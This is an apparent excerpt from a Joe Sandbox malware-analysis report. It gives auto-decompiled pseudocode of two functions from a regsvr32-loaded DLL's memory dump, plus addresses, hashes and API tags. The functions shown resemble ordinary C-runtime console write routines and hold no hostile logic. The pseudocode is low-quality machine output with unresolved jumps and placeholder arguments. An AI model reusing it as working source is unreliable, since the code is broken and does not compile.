                                                                                                                                                                                                                    • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                                    • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                    			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                                                                                                                                    				void* __rdi;
                                                                                                                                                                                                                    				void* __rsi;
                                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                                    				intOrPtr _t183;
                                                                                                                                                                                                                    				signed int _t187;
                                                                                                                                                                                                                    				signed int _t194;
                                                                                                                                                                                                                    				signed int _t199;
                                                                                                                                                                                                                    				intOrPtr _t208;
                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                    				signed char _t211;
                                                                                                                                                                                                                    				void* _t261;
                                                                                                                                                                                                                    				signed long long _t262;
                                                                                                                                                                                                                    				long long _t267;
                                                                                                                                                                                                                    				long long _t269;
                                                                                                                                                                                                                    				void* _t270;
                                                                                                                                                                                                                    				long long _t272;
                                                                                                                                                                                                                    				intOrPtr* _t278;
                                                                                                                                                                                                                    				intOrPtr* _t285;
                                                                                                                                                                                                                    				long long _t287;
                                                                                                                                                                                                                    				long long _t313;
                                                                                                                                                                                                                    				void* _t321;
                                                                                                                                                                                                                    				long long _t322;
                                                                                                                                                                                                                    				void* _t323;
                                                                                                                                                                                                                    				long long _t324;
                                                                                                                                                                                                                    				long long _t326;
                                                                                                                                                                                                                    				signed char* _t327;
                                                                                                                                                                                                                    				signed char* _t328;
                                                                                                                                                                                                                    				signed char* _t329;
                                                                                                                                                                                                                    				void* _t330;
                                                                                                                                                                                                                    				void* _t331;
                                                                                                                                                                                                                    				void* _t332;
                                                                                                                                                                                                                    				signed long long _t333;
                                                                                                                                                                                                                    				intOrPtr _t336;
                                                                                                                                                                                                                    				intOrPtr _t339;
                                                                                                                                                                                                                    				void* _t341;
                                                                                                                                                                                                                    				signed long long _t343;
                                                                                                                                                                                                                    				signed long long _t345;
                                                                                                                                                                                                                    				long long _t354;
                                                                                                                                                                                                                    				void* _t358;
                                                                                                                                                                                                                    				long long _t359;
                                                                                                                                                                                                                    				signed long long _t362;
                                                                                                                                                                                                                    				char _t363;
                                                                                                                                                                                                                    				signed long long _t364;
                                                                                                                                                                                                                    				void* _t367;
                                                                                                                                                                                                                    				signed char* _t368;
                                                                                                                                                                                                                    				signed long long _t370;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t261 = _t332;
                                                                                                                                                                                                                    				_t331 = _t261 - 0x57;
                                                                                                                                                                                                                    				_t333 = _t332 - 0xd0;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 9)) = 0xfffffffe;
                                                                                                                                                                                                                    				 *((long long*)(_t261 + 8)) = __rbx;
                                                                                                                                                                                                                    				_t262 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				 *(_t331 + 0x17) = _t262 ^ _t333;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x41)) = __r8;
                                                                                                                                                                                                                    				_t278 = __rcx;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
                                                                                                                                                                                                                    				_t362 = __edx >> 6;
                                                                                                                                                                                                                    				 *(_t331 - 0x39) = _t362;
                                                                                                                                                                                                                    				_t370 = __edx + __edx * 8;
                                                                                                                                                                                                                    				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x19)) = _t267;
                                                                                                                                                                                                                    				r12d = r9d;
                                                                                                                                                                                                                    				_t359 = _t358 + __r8;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x61)) = _t359;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
                                                                                                                                                                                                                    				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
                                                                                                                                                                                                                    				0x80006f60();
                                                                                                                                                                                                                    				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
                                                                                                                                                                                                                    				 *((long long*)(__rcx)) = _t267;
                                                                                                                                                                                                                    				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
                                                                                                                                                                                                                    				_t343 = __edx >> 6;
                                                                                                                                                                                                                    				 *(_t331 - 0x11) = _t343;
                                                                                                                                                                                                                    				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
                                                                                                                                                                                                                    				r12d = 1;
                                                                                                                                                                                                                    				if (_t208 != 0xfde9) goto 0x8000d81d;
                                                                                                                                                                                                                    				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
                                                                                                                                                                                                                    				if ( *_t285 == dil) goto 0x8000d6ca;
                                                                                                                                                                                                                    				_t367 = _t324 + 1;
                                                                                                                                                                                                                    				if (_t367 - 5 < 0) goto 0x8000d6b7;
                                                                                                                                                                                                                    				if (_t367 <= 0) goto 0x8000d7b3;
                                                                                                                                                                                                                    				r12d =  *((char*)(_t285 + 0x1800218d1));
                                                                                                                                                                                                                    				r12d = r12d + 1;
                                                                                                                                                                                                                    				_t183 = r12d - 1;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
                                                                                                                                                                                                                    				_t336 = _t183;
                                                                                                                                                                                                                    				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
                                                                                                                                                                                                                    				_t287 = _t324;
                                                                                                                                                                                                                    				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
                                                                                                                                                                                                                    				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
                                                                                                                                                                                                                    				if (_t336 <= 0) goto 0x8000d74b;
                                                                                                                                                                                                                    				0x80004b30();
                                                                                                                                                                                                                    				_t354 =  *((intOrPtr*)(_t331 - 0x59));
                                                                                                                                                                                                                    				_t313 = _t324;
                                                                                                                                                                                                                    				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
                                                                                                                                                                                                                    				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x31)) = _t324;
                                                                                                                                                                                                                    				_t269 = _t331 - 1;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x29)) = _t269;
                                                                                                                                                                                                                    				_t187 = (0 | r12d == 0x00000004) + 1;
                                                                                                                                                                                                                    				r12d = _t187;
                                                                                                                                                                                                                    				r8d = _t187;
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                                                                                                                                    				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
                                                                                                                                                                                                                    				if (_t269 == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                                    				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
                                                                                                                                                                                                                    				goto 0x8000d8ae;
                                                                                                                                                                                                                    				_t363 =  *((char*)(_t269 + 0x1800218d0));
                                                                                                                                                                                                                    				_t210 = _t363 + 1;
                                                                                                                                                                                                                    				_t270 = _t210;
                                                                                                                                                                                                                    				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x51)) = _t324;
                                                                                                                                                                                                                    				 *((long long*)(_t331 - 0x21)) = _t326;
                                                                                                                                                                                                                    				_t194 = (0 | _t210 == 0x00000004) + 1;
                                                                                                                                                                                                                    				r14d = _t194;
                                                                                                                                                                                                                    				r8d = _t194;
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                                                                                                                                    				_t345 = _t331 - 0x51;
                                                                                                                                                                                                                    				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
                                                                                                                                                                                                                    				if (_t270 == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                                    				_t327 = _t326 + _t363;
                                                                                                                                                                                                                    				r12d = r14d;
                                                                                                                                                                                                                    				_t364 =  *(_t331 - 0x39);
                                                                                                                                                                                                                    				goto 0x8000d8ae;
                                                                                                                                                                                                                    				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
                                                                                                                                                                                                                    				_t211 =  *(_t339 + 0x3d + _t370 * 8);
                                                                                                                                                                                                                    				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
                                                                                                                                                                                                                    				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
                                                                                                                                                                                                                    				 *((char*)(_t331 + 8)) =  *_t327;
                                                                                                                                                                                                                    				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
                                                                                                                                                                                                                    				r8d = 2;
                                                                                                                                                                                                                    				goto 0x8000d899;
                                                                                                                                                                                                                    				r9d =  *_t327 & 0x000000ff;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
                                                                                                                                                                                                                    				_t368 =  &(_t327[1]);
                                                                                                                                                                                                                    				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
                                                                                                                                                                                                                    				r8d = 2;
                                                                                                                                                                                                                    				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                                    				_t328 = _t368;
                                                                                                                                                                                                                    				goto 0x8000d8ae;
                                                                                                                                                                                                                    				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
                                                                                                                                                                                                                    				if (_t199 == 0xffffffff) goto 0x8000da03;
                                                                                                                                                                                                                    				_t329 =  &(_t328[1]);
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x38)) = _t324;
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x30)) = _t324;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t333 + 0x28)) = 5;
                                                                                                                                                                                                                    				_t272 = _t331 + 0xf;
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x20)) = _t272;
                                                                                                                                                                                                                    				r9d = r12d;
                                                                                                                                                                                                                    				_t341 = _t331 - 0x6d;
                                                                                                                                                                                                                    				E0000000118000A154();
                                                                                                                                                                                                                    				r14d = _t199;
                                                                                                                                                                                                                    				if (_t199 == 0) goto 0x8000da03;
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                                                                                                                                    				r8d = _t199;
                                                                                                                                                                                                                    				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
                                                                                                                                                                                                                    				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
                                                                                                                                                                                                                    				 *((short*)(_t331 - 0x71)) = 0xd;
                                                                                                                                                                                                                    				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                                                                                                                                    				_t130 = _t272 - 0xc; // 0x1
                                                                                                                                                                                                                    				r8d = _t130;
                                                                                                                                                                                                                    				_t321 = _t331 - 0x71;
                                                                                                                                                                                                                    				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
                                                                                                                                                                                                                    				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
                                                                                                                                                                                                                    				goto 0x8000d681;
                                                                                                                                                                                                                    				if (_t321 <= 0) goto 0x8000d9a9;
                                                                                                                                                                                                                    				_t330 = _t329 - _t368;
                                                                                                                                                                                                                    				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
                                                                                                                                                                                                                    				if (1 - _t321 < 0) goto 0x8000d988;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
                                                                                                                                                                                                                    				goto 0x8000da03;
                                                                                                                                                                                                                    				if (_t341 <= 0) goto 0x8000d9da;
                                                                                                                                                                                                                    				_t322 = _t324;
                                                                                                                                                                                                                    				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
                                                                                                                                                                                                                    				_t323 = _t322 + 1;
                                                                                                                                                                                                                    				if (2 - _t341 < 0) goto 0x8000d9ba;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
                                                                                                                                                                                                                    				goto 0x8000da03;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
                                                                                                                                                                                                                    				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
                                                                                                                                                                                                                    				_t173 = _t323 + 1; // 0x1
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t278 + 4)) = _t173;
                                                                                                                                                                                                                    				goto 0x8000da03;
                                                                                                                                                                                                                    				 *_t278 = GetLastError();
                                                                                                                                                                                                                    				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
                                                                                                                                                                                                                    			}

















































                                                                                                                                                                                                                    0x18000d5b8
                                                                                                                                                                                                                    0x18000d5c6
                                                                                                                                                                                                                    0x18000d5ca
                                                                                                                                                                                                                    0x18000d5d1
                                                                                                                                                                                                                    0x18000d5d9
                                                                                                                                                                                                                    0x18000d5dd
                                                                                                                                                                                                                    0x18000d5e7
                                                                                                                                                                                                                    0x18000d5ee
                                                                                                                                                                                                                    0x18000d5f5
                                                                                                                                                                                                                    0x18000d5fc
                                                                                                                                                                                                                    0x18000d606
                                                                                                                                                                                                                    0x18000d60a
                                                                                                                                                                                                                    0x18000d618
                                                                                                                                                                                                                    0x18000d624
                                                                                                                                                                                                                    0x18000d629
                                                                                                                                                                                                                    0x18000d62d
                                                                                                                                                                                                                    0x18000d630
                                                                                                                                                                                                                    0x18000d633
                                                                                                                                                                                                                    0x18000d63d
                                                                                                                                                                                                                    0x18000d64a
                                                                                                                                                                                                                    0x18000d64f
                                                                                                                                                                                                                    0x18000d65c
                                                                                                                                                                                                                    0x18000d65f
                                                                                                                                                                                                                    0x18000d664
                                                                                                                                                                                                                    0x18000d667
                                                                                                                                                                                                                    0x18000d66e
                                                                                                                                                                                                                    0x18000d677
                                                                                                                                                                                                                    0x18000d67b
                                                                                                                                                                                                                    0x18000d683
                                                                                                                                                                                                                    0x18000d686
                                                                                                                                                                                                                    0x18000d689
                                                                                                                                                                                                                    0x18000d69c
                                                                                                                                                                                                                    0x18000d6af
                                                                                                                                                                                                                    0x18000d6ba
                                                                                                                                                                                                                    0x18000d6be
                                                                                                                                                                                                                    0x18000d6c8
                                                                                                                                                                                                                    0x18000d6cd
                                                                                                                                                                                                                    0x18000d6e1
                                                                                                                                                                                                                    0x18000d6ea
                                                                                                                                                                                                                    0x18000d6f0
                                                                                                                                                                                                                    0x18000d6f2
                                                                                                                                                                                                                    0x18000d6fc
                                                                                                                                                                                                                    0x18000d702
                                                                                                                                                                                                                    0x18000d708
                                                                                                                                                                                                                    0x18000d71d
                                                                                                                                                                                                                    0x18000d72a
                                                                                                                                                                                                                    0x18000d72f
                                                                                                                                                                                                                    0x18000d73b
                                                                                                                                                                                                                    0x18000d740
                                                                                                                                                                                                                    0x18000d74b
                                                                                                                                                                                                                    0x18000d759
                                                                                                                                                                                                                    0x18000d764
                                                                                                                                                                                                                    0x18000d766
                                                                                                                                                                                                                    0x18000d76a
                                                                                                                                                                                                                    0x18000d76e
                                                                                                                                                                                                                    0x18000d77b
                                                                                                                                                                                                                    0x18000d77d
                                                                                                                                                                                                                    0x18000d780
                                                                                                                                                                                                                    0x18000d783
                                                                                                                                                                                                                    0x18000d794
                                                                                                                                                                                                                    0x18000d79d
                                                                                                                                                                                                                    0x18000d7ab
                                                                                                                                                                                                                    0x18000d7ae
                                                                                                                                                                                                                    0x18000d7b6
                                                                                                                                                                                                                    0x18000d7bf
                                                                                                                                                                                                                    0x18000d7ca
                                                                                                                                                                                                                    0x18000d7d0
                                                                                                                                                                                                                    0x18000d7d6
                                                                                                                                                                                                                    0x18000d7da
                                                                                                                                                                                                                    0x18000d7e6
                                                                                                                                                                                                                    0x18000d7e8
                                                                                                                                                                                                                    0x18000d7eb
                                                                                                                                                                                                                    0x18000d7ee
                                                                                                                                                                                                                    0x18000d7f3
                                                                                                                                                                                                                    0x18000d7ff
                                                                                                                                                                                                                    0x18000d808
                                                                                                                                                                                                                    0x18000d80e
                                                                                                                                                                                                                    0x18000d811
                                                                                                                                                                                                                    0x18000d814
                                                                                                                                                                                                                    0x18000d818
                                                                                                                                                                                                                    0x18000d81d
                                                                                                                                                                                                                    0x18000d825
                                                                                                                                                                                                                    0x18000d82d
                                                                                                                                                                                                                    0x18000d834
                                                                                                                                                                                                                    0x18000d839
                                                                                                                                                                                                                    0x18000d83f
                                                                                                                                                                                                                    0x18000d844
                                                                                                                                                                                                                    0x18000d84e
                                                                                                                                                                                                                    0x18000d850
                                                                                                                                                                                                                    0x18000d860
                                                                                                                                                                                                                    0x18000d862
                                                                                                                                                                                                                    0x18000d86a
                                                                                                                                                                                                                    0x18000d873
                                                                                                                                                                                                                    0x18000d888
                                                                                                                                                                                                                    0x18000d88e
                                                                                                                                                                                                                    0x18000d891
                                                                                                                                                                                                                    0x18000d8a0
                                                                                                                                                                                                                    0x18000d8a8
                                                                                                                                                                                                                    0x18000d8ae
                                                                                                                                                                                                                    0x18000d8b1
                                                                                                                                                                                                                    0x18000d8b6
                                                                                                                                                                                                                    0x18000d8bb
                                                                                                                                                                                                                    0x18000d8c3
                                                                                                                                                                                                                    0x18000d8c7
                                                                                                                                                                                                                    0x18000d8cc
                                                                                                                                                                                                                    0x18000d8cf
                                                                                                                                                                                                                    0x18000d8d8
                                                                                                                                                                                                                    0x18000d8dd
                                                                                                                                                                                                                    0x18000d8e2
                                                                                                                                                                                                                    0x18000d8e8
                                                                                                                                                                                                                    0x18000d8f1
                                                                                                                                                                                                                    0x18000d907
                                                                                                                                                                                                                    0x18000d915
                                                                                                                                                                                                                    0x18000d91c
                                                                                                                                                                                                                    0x18000d926
                                                                                                                                                                                                                    0x18000d92d
                                                                                                                                                                                                                    0x18000d931
                                                                                                                                                                                                                    0x18000d93a
                                                                                                                                                                                                                    0x18000d93a
                                                                                                                                                                                                                    0x18000d93e
                                                                                                                                                                                                                    0x18000d94d
                                                                                                                                                                                                                    0x18000d957
                                                                                                                                                                                                                    0x18000d95d
                                                                                                                                                                                                                    0x18000d960
                                                                                                                                                                                                                    0x18000d96a
                                                                                                                                                                                                                    0x18000d97b
                                                                                                                                                                                                                    0x18000d983
                                                                                                                                                                                                                    0x18000d985
                                                                                                                                                                                                                    0x18000d997
                                                                                                                                                                                                                    0x18000d9a7
                                                                                                                                                                                                                    0x18000d9a9
                                                                                                                                                                                                                    0x18000d9ac
                                                                                                                                                                                                                    0x18000d9b1
                                                                                                                                                                                                                    0x18000d9b3
                                                                                                                                                                                                                    0x18000d9c8
                                                                                                                                                                                                                    0x18000d9cf
                                                                                                                                                                                                                    0x18000d9d8
                                                                                                                                                                                                                    0x18000d9da
                                                                                                                                                                                                                    0x18000d9de
                                                                                                                                                                                                                    0x18000d9e0
                                                                                                                                                                                                                    0x18000d9ed
                                                                                                                                                                                                                    0x18000d9f3
                                                                                                                                                                                                                    0x18000d9f6
                                                                                                                                                                                                                    0x18000d9f9
                                                                                                                                                                                                                    0x18000da01
                                                                                                                                                                                                                    0x18000da2c

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                    • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                                    • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 28%
                                                                                                                                                                                                                    			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                                                                                                                                    				signed long long _v88;
                                                                                                                                                                                                                    				void* _v96;
                                                                                                                                                                                                                    				void* _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				long _v128;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				long long _v144;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				void* __rbx;
                                                                                                                                                                                                                    				void* __rsi;
                                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                                    				signed short _t99;
                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                    				long _t116;
                                                                                                                                                                                                                    				signed int _t117;
                                                                                                                                                                                                                    				void* _t122;
                                                                                                                                                                                                                    				signed short _t127;
                                                                                                                                                                                                                    				signed int _t130;
                                                                                                                                                                                                                    				signed short _t133;
                                                                                                                                                                                                                    				signed short _t159;
                                                                                                                                                                                                                    				signed short _t167;
                                                                                                                                                                                                                    				signed long long _t180;
                                                                                                                                                                                                                    				signed int _t184;
                                                                                                                                                                                                                    				signed short* _t197;
                                                                                                                                                                                                                    				signed int _t204;
                                                                                                                                                                                                                    				signed int _t205;
                                                                                                                                                                                                                    				signed short* _t206;
                                                                                                                                                                                                                    				void* _t208;
                                                                                                                                                                                                                    				signed long long _t220;
                                                                                                                                                                                                                    				void* _t221;
                                                                                                                                                                                                                    				signed long long _t222;
                                                                                                                                                                                                                    				signed long long _t223;
                                                                                                                                                                                                                    				void* _t224;
                                                                                                                                                                                                                    				signed short* _t226;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t197 = __rdx;
                                                                                                                                                                                                                    				_t122 = __ebx;
                                                                                                                                                                                                                    				r14d = r8d;
                                                                                                                                                                                                                    				_t184 = __r9;
                                                                                                                                                                                                                    				_t206 = __rdx;
                                                                                                                                                                                                                    				if (r8d == 0) goto 0x8000e1d3;
                                                                                                                                                                                                                    				if (__rdx != 0) goto 0x8000df47;
                                                                                                                                                                                                                    				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                                                                                                                                    				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                                                                                                                                    				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                                                                                                                                    				r9d = 0;
                                                                                                                                                                                                                    				_v144 = __r9;
                                                                                                                                                                                                                    				_v152 = _t205;
                                                                                                                                                                                                                    				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
                                                                                                                                                                                                                    				goto 0x8000e1d5;
                                                                                                                                                                                                                    				_t220 = __ecx >> 6;
                                                                                                                                                                                                                    				_v88 = _t220;
                                                                                                                                                                                                                    				_t223 = __ecx + __ecx * 8;
                                                                                                                                                                                                                    				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
                                                                                                                                                                                                                    				_v136 = _t99;
                                                                                                                                                                                                                    				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
                                                                                                                                                                                                                    				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
                                                                                                                                                                                                                    				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
                                                                                                                                                                                                                    				_t23 = _t197 + 2; // 0x2
                                                                                                                                                                                                                    				r8d = _t23;
                                                                                                                                                                                                                    				E0000000118000E958(r15d);
                                                                                                                                                                                                                    				_v112 = _t205;
                                                                                                                                                                                                                    				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
                                                                                                                                                                                                                    				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
                                                                                                                                                                                                                    				0x80006f60();
                                                                                                                                                                                                                    				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
                                                                                                                                                                                                                    				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
                                                                                                                                                                                                                    				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
                                                                                                                                                                                                                    				_t127 = _v136;
                                                                                                                                                                                                                    				_t159 = _t127;
                                                                                                                                                                                                                    				if (_t159 == 0) goto 0x8000e099;
                                                                                                                                                                                                                    				if (_t159 == 0) goto 0x8000e024;
                                                                                                                                                                                                                    				if (_t127 - 1 != 1) goto 0x8000e15d;
                                                                                                                                                                                                                    				_t221 = _t206 + _t224;
                                                                                                                                                                                                                    				_v128 = _t205;
                                                                                                                                                                                                                    				_t226 = _t206;
                                                                                                                                                                                                                    				if (_t206 - _t221 >= 0) goto 0x8000e090;
                                                                                                                                                                                                                    				r14d = _v124;
                                                                                                                                                                                                                    				_v136 =  *_t226 & 0x0000ffff;
                                                                                                                                                                                                                    				_t107 = E0000000118000E960( *_t226 & 0xffff);
                                                                                                                                                                                                                    				_t130 = _v136 & 0x0000ffff;
                                                                                                                                                                                                                    				if (_t107 != _t130) goto 0x8000e087;
                                                                                                                                                                                                                    				r14d = r14d + 2;
                                                                                                                                                                                                                    				_v124 = r14d;
                                                                                                                                                                                                                    				if (_t130 != 0xa) goto 0x8000e07c;
